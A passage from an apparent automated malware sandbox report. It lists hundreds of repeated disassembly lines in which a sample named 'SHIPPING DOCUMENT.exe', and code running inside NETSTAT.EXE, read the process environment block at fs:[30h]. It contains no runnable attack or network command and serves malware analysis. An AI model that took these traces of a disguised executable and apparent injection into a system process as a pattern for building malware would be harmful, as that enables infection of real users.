          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03995BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03908EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03904A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03904A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03954257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03978DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0394A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03903D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03943540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EC577 mov eax, dword ptr fs:[00000030h]
